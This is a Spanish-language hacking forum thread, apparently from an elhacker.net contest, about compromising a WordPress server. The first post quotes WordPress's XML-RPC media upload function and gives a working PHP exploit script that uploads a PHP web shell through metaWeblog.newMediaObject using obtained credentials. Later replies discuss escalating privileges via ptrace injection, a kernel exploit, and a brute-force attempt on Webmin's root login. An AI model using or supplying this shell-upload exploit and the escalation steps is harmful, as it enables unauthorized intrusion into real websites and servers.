Bueno , voy a explicar algo que desconocia y que descubri buscando formas diferentes de subir shell.


Luego de poder entrar via SQLi ya sea desde el wordpress o el phpmyadmin ,empeze a buscar otras formas. Leyendo el source de wordpress , encontre un archivo muy lindo llamado xmlrpc.php(No lo pongo porque no me deja poner mucho texto)

Despues de leerlo todo , no lo podia creer lo servido que estaba.

Observemos esta funcion:

/* metaweblog.newMediaObject uploads a file, following your settings */
	function mw_newMediaObject($args) {
		// adapted from a patch by Johann Richard
		// http://mycvs.org/archives/2004/06/30/file-upload-to-wordpress-in-ecto/
 
		global $wpdb;
 
		$blog_ID     = $wpdb->escape($args[0]);
		$user_login  = $wpdb->escape($args[1]);
		$user_pass   = $wpdb->escape($args[2]);
		$data        = $args[3];
 
		$name = $data['name'];
		$type = $data['type'];
		$bits = $data['bits'];
 
		logIO('O', '(MW) Received '.strlen($bits).' bytes');
 
		if ( !$this->login_pass_ok($user_login, $user_pass) )
			return $this->error;
 
		set_current_user(0, $user_login);
		if ( !current_user_can('upload_files') ) {
			logIO('O', '(MW) User does not have upload_files capability');
			$this->error = new IXR_Error(401, 'You are not allowed to upload files to this site.');
			return $this->error;
		}
 
		$upload = wp_upload_bits($name, $type, $bits);
		if ( ! empty($upload['error']) ) {
			logIO('O', '(MW) Could not write file '.$name);
			return new IXR_Error(500, 'Could not write file '.$name);
		}
 
		return array('url' => $upload['url']);
	}
 
 
 

Sisi muchachos , hace un upload! Entonces simplemente creo un exploit...

<?php
include_once("class-IXR.php");
 
echo "Exploit para concurso de elhacker.net";
 
$cliente=new IXR_CLIENT('http://IP/xmlrpc.php');
 
$tamano=filesize('shell.php');
$archivo=fopen('shell.php','rb');
$data=fread($archivo,$tamano);
fclose($archivo);
 
$shell=array(
	'name'=>"shell.php",
	'type'=>"application/php",
	'bits'=>new IXR_Base64($data)
	);
 
$cliente->query('metaWeblog.newMediaObject',array(
	0,
	"ret2libc",
	"password",
	$shell
	));
 
print_r($cliente->getResponse());
 
echo "Check bitch!";
 
 
 
 
?>
 
 

Class-IXR.php lo pueden encontrar en wordpress. No lo voy a postear.

Bueno , aprendi algo nuevo y lo comparto.Y encima repase algo de php que estaba bastante oxidado.

:O Me parece que esto explica porque uname -a nos devuelve que es Red Hat XD.

Después de 25 minutos de Jugaad, parece que no.

https://www.youtube.com/watch?v=Nm5htFWAVUE

Vaya, si puedes inyectar código en procesos que son tuyos a través de ptrace() pero no puedes inyectar a un proceso del root. Y también tiene que estar habilitado en el kernel (en la conferencia, mencionan que ubuntu lo tiene desactivado desde la 10.04 en adelante).

Eso parece... En parte creo que x los permisos de webmin ... Que alguien modifico.

Lo que pasa es que está usando un sistema virtualizado, OVH aquí está usando OpenVz (hay otros sistemas en OVH). Si te das cuenta en el /proc/mounts aparece la ruta del disco duro del sistema virtualizado en el host. Lo ha puesto ret2libc.

http://en.wikipedia.org/wiki/OpenVZ

Encontre un exploit que podría funcionar, salio hace un mes, el problema es que necesito compilarlo ahí en el host xD y otros pequeños detalles también.

Voy a intentar a hacer brute force al webmin con root a ver si tiene una contraseña débil.

Edit: Error - Access denied for x.x.x.x. The host has been blocked because of too many authentication failures. NOUP.